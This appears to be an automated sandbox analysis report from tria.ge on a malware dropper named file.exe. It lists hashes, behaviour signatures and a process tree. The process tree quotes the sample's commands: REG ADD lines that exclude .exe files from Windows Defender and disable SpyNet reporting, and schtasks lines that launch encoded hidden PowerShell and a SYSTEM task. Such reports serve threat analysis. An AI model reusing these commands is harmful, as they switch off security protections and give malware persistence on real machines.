Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
192s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2022, 17:03
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
c5d329fbd15ae53d4429c0a2b9811b52
-
SHA1
6063a8bad5a7449fb1afafc51a4f63058cb1284f
-
SHA256
a1e35f678e9003c0fc6023451952a1e84f7544b3ef9d7b49c9fa0b790c17532a
-
SHA512
b6169748e359145fdb3b6207e1e52cbaffceecd9fa839607a62af472d14e20900660c172ef71bf0ea78557d21bbd9a1e9b3aa2c2585ad0f35b05b2e2d47f4372
-
SSDEEP
196608:91OEF5vIu50q++zJZQuTX18vpd3oeSWSf8gSoAkS:3OELIu5L++nQuTFoHSWSf8gc
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3248 Install.exe 4940 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2660 schtasks.exe 3920 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5012 powershell.EXE 5012 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5012 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4604 wrote to memory of 3248 4604 file.exe 80 PID 4604 wrote to memory of 3248 4604 file.exe 80 PID 4604 wrote to memory of 3248 4604 file.exe 80 PID 3248 wrote to memory of 4940 3248 Install.exe 81 PID 3248 wrote to memory of 4940 3248 Install.exe 81 PID 3248 wrote to memory of 4940 3248 Install.exe 81 PID 4940 wrote to memory of 1448 4940 Install.exe 82 PID 4940 wrote to memory of 1448 4940 Install.exe 82 PID 4940 wrote to memory of 1448 4940 Install.exe 82 PID 4940 wrote to memory of 1656 4940 Install.exe 85 PID 4940 wrote to memory of 1656 4940 Install.exe 85 PID 4940 wrote to memory of 1656 4940 Install.exe 85 PID 1448 wrote to memory of 1632 1448 forfiles.exe 87 PID 1448 wrote to memory of 1632 1448 forfiles.exe 87 PID 1448 wrote to memory of 1632 1448 forfiles.exe 87 PID 1656 wrote to memory of 4128 1656 forfiles.exe 86 PID 1656 wrote to memory of 4128 1656 forfiles.exe 86 PID 1656 wrote to memory of 4128 1656 forfiles.exe 86 PID 1632 wrote to memory of 4596 1632 cmd.exe 89 PID 1632 wrote to memory of 4596 1632 cmd.exe 89 PID 1632 wrote to memory of 4596 1632 cmd.exe 89 PID 4128 wrote to memory of 2560 4128 cmd.exe 88 PID 4128 wrote to memory of 2560 4128 cmd.exe 88 PID 4128 wrote to memory of 2560 4128 cmd.exe 88 PID 4128 wrote to memory of 4288 4128 cmd.exe 91 PID 1632 wrote to memory of 1252 1632 cmd.exe 90 PID 4128 wrote to memory of 4288 4128 cmd.exe 91 PID 4128 wrote to memory of 4288 4128 cmd.exe 91 PID 1632 wrote to memory of 1252 1632 cmd.exe 90 PID 1632 wrote to memory of 1252 1632 cmd.exe 90 PID 4940 wrote to memory of 2660 4940 Install.exe 92 PID 4940 wrote to memory of 2660 4940 Install.exe 92 PID 4940 wrote to memory of 2660 4940 Install.exe 92 PID 4940 wrote to memory of 2564 4940 Install.exe 94 PID 4940 wrote to memory of 2564 4940 Install.exe 94 PID 4940 wrote to memory of 2564 4940 Install.exe 94 PID 4940 wrote to memory of 1208 4940 Install.exe 98 PID 4940 wrote to memory of 1208 4940 Install.exe 98 PID 4940 wrote to memory of 1208 4940 Install.exe 98 PID 4940 wrote to memory of 3920 4940 Install.exe 100 PID 4940 wrote to memory of 3920 4940 Install.exe 100 PID 4940 wrote to memory of 3920 4940 Install.exe 100 PID 5012 wrote to memory of 3812 5012 powershell.EXE 104 PID 5012 wrote to memory of 3812 5012 powershell.EXE 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\7zS5505.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\7zS5D62.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4596
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2560
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4288
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grRoBHVhv" /SC once /ST 07:26:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grRoBHVhv"4⤵PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grRoBHVhv"4⤵PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\YajuaZf.exe\" q8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3920
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3812
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3536
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4012
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD51dcc91923510d69f0a54c9c31ac4d1f4
SHA1ee0e1e14eadc0db52e94c36badb2e239becc57c4
SHA256bed8cd6b2eb7f865d99f695ef909a909bcfad027408787d1b329601c10fddd74
SHA5122626995322e055b69d8154d80ce35d089efef34418a8bba80ee9ddf880daaf6173c1e27fd90f3a2ad4a1ac7f4157b697a4e132f3221817aebdc5ad8b723597f3
-
Filesize
6.3MB
MD51dcc91923510d69f0a54c9c31ac4d1f4
SHA1ee0e1e14eadc0db52e94c36badb2e239becc57c4
SHA256bed8cd6b2eb7f865d99f695ef909a909bcfad027408787d1b329601c10fddd74
SHA5122626995322e055b69d8154d80ce35d089efef34418a8bba80ee9ddf880daaf6173c1e27fd90f3a2ad4a1ac7f4157b697a4e132f3221817aebdc5ad8b723597f3
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269